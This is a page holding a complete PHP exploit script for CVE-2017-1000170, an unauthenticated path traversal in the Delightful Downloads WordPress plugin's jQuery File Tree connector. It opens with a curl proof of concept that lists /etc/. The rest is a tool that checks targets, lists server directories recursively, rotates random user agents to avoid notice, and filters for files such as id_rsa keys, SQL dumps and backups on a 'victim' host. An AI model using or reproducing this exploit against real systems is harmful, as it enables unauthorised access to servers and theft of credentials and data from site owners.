扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 |
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal # Date: 19/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads # Version: <=1.6.6 # Tested on: Debian 11 # CVE : CVE-2017-1000170 # PHP version (exploit): 7.3.27 # POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php <?php $vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change $agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)", "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)", "Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321", "Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4", "Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4", "Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)", "Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00", "Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2", "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0", "Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6", "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0", "Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0", "Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0", "Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3", "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340", "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362", "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1", "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00", "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)", "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00", "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7", "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341", "Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00", "Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00", "Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5", "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362", "Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1", "Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00", "Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4", "Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00", "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)", "Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00", "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7", "Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0", "Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00", "Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6", "Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0", "Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)", "Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00", "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0", "Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311", "Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0", "Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330", "Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"]; function post_request($url, $data, $random_agent = 0){ global $agents; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data)); #curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp if($random_agent){ curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]); } $output = curl_exec($ch); curl_close($ch); return $output; } function parse_dir($str){ // by raina77ow =) $contents = array(); $startFrom = $contentStart = $contentEnd = 0; while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){ $contentStart += 5; $contentEnd = strpos($str, '">', $contentStart); if (false === $contentEnd){ break; } $contents[] = substr($str, $contentStart, $contentEnd - $contentStart); $startFrom = $contentEnd + 2; } return $contents; } function list_files($url,$path, $recursive=0,$filter){ global $vuln_file; global $recursive; global $random_agent; $exts = ""; $extensions = ""; $files = ""; (count($filter) > 0) ? $has_filter = 1 : $has_filter = 0; $parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree foreach($parsed as $file_or_folder){ if($has_filter){ foreach($filter as $filtered){ if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter echo "".$file_or_folder."\n"; continue; } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); } continue 2; // continue the outermost foreach } } continue; // if has filter, always restart the loop here } if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder if($recursive){ //if recursive flag is set, enter on each folder and do it list_files($url, $file_or_folder, $recursive, $filter); }else{ echo "".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name } }else{ //is a file echo "".$file_or_folder."\n"; } continue; } } function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain if($path == "/" && $recursive == 1){ echo red("[i] WARNING: Scanning the root of the webserver recursivelly can exceed the timeout limit, block your IP or even take down the server. Are you sure you want to continue? [y/N] "); $handle = fopen ("php://stdin","r"); $line = fgets($handle); if(trim(strtoupper($line)) != 'Y'){ echo "\nAborted. Try running me without the recursion flag\n\n"; exit; } fclose($handle); echo cyan("\n\nOk, don't say I didn't warn you...\n"); } list_files($target,$path, $recursive, $filter); } ############################################################ function green($str){ return "\e[92m".$str."\e[0m"; } function red($str){ return "\e[91m".$str."\e[0m"; } function yellow($str){ return "\e[93m".$str."\e[0m"; } function cyan($str){ return "\e[96m".$str."\e[0m"; } function banner(){ echo " _____ _ _ _ ___ _ _______ |__ \ | (_) | | | |/ _| | |__ __| | || | ___| |___ _| |__ | |_| |_ _ _| || |_ __ ______ | || |/ _ \ | |/ _` |_ \| __|_| | | | || | ´__/ _ \/ _ \ | |__| |__/ | | (_| | | | | |_| | | |_| | || | | |__/__/ |_____/ \___|_|_|\__, |_| |_|\__|_|\__,_|_||_|_|\___|\___| __/ |".green("Coder:").yellow("Nicholas Ferreira")." |___/ 0x7359 ".cyan("Delightful Downloads - Jquery File Tree")." Unauthenticated Path Traversal exploit ". red("\n(CVE-2017-1000170)")." "; } // ======================= CHECKING ======================= $short_args = "u:h::p:r::f:a::"; $long_args = array("url:","help::","path:","recursive::","filter:","random-agent::"); $options = getopt($short_args, $long_args); if($argc == 1){ die(banner()."Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\nHelp: -h or --help\n\n"); } if(isset($options['h']) || isset($options['help'])){ banner(); die( "Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a] -h, --help: Show this message -u, --url: URL of target -a, --random-agent: Use random user agents -f, --filter: Name of files or extensions to search for (separated by comma) -p, --path: The full path from which the filenames will be read (default: /) -r, --recursive: Generates the tree recursivelly (be careful) e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")." | \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths (You must provide the dot to indicate it's an extension) ".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")." | \-> This will search for all files named \"id_rsa\" or having the extension \".log\" within all folders of the server, with random user-agents ".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")." "); } $random_agent = 0; if(isset($options['a'])){ $random_agent = 1; }elseif(isset($options['random-agent'])){ $random_agent = 1; } $target = ""; if(isset($options['u'])){ $target = $options['u']; }elseif(isset($options['url'])){ $target = $options['url']; } $recursive = 0; if(isset($options['r'])){ $recursive = 1; }elseif(isset($options['recursive'])){ $recursive = 1; } $path = "/"; if(isset($options['p'])){ $path = $options['p']; }elseif(isset($options['path'])){ $path = $options['p']; } if($path !== "/"){ if(!preg_match("#^\/.*\/$#", $path)){ $path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it } } $extensions = ""; if(isset($options['f'])){ $extensions = $options['f']; //strings }elseif(isset($options['filter'])){ $extensions = $options['filter']; //string } $filter = array(); if($extensions !== ""){ $filter = explode(",", $extensions); } // ========================= END CHECKING ========================== function is_vulnerable($url){ global $vuln_file; global $random_agent; global $filter; echo "[*] Target: ".$url."\n"; if(count($filter) > 0){ echo "[*] Filter: ".implode(", ", $filter)."\n\n"; } echo cyan("[i] Checking if the target is vulnerable...\n"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url.$vuln_file); curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if(substr($code,0,1) == 2){ // 2xx echo yellow("[i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n"); $post = post_request($url.$vuln_file, "/", $random_agent); if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){ echo green("[+] Target is vulnerable! Getting file list...\n\n"); return true; } echo red("[-] Target is not vulnerable... =(\n\n"); }else{ echo red("[-] Could not find a valid vulnerable file. Maybe it doesn't exist, you don't have permission to read it or it is in another directory.\n"); } return false; } banner(); if(is_vulnerable($target)){ global $filter; alert_user($target,$path, $recursive, $filter); echo green("\n[+] Done!\n\n"); } ?> |
体验盒子
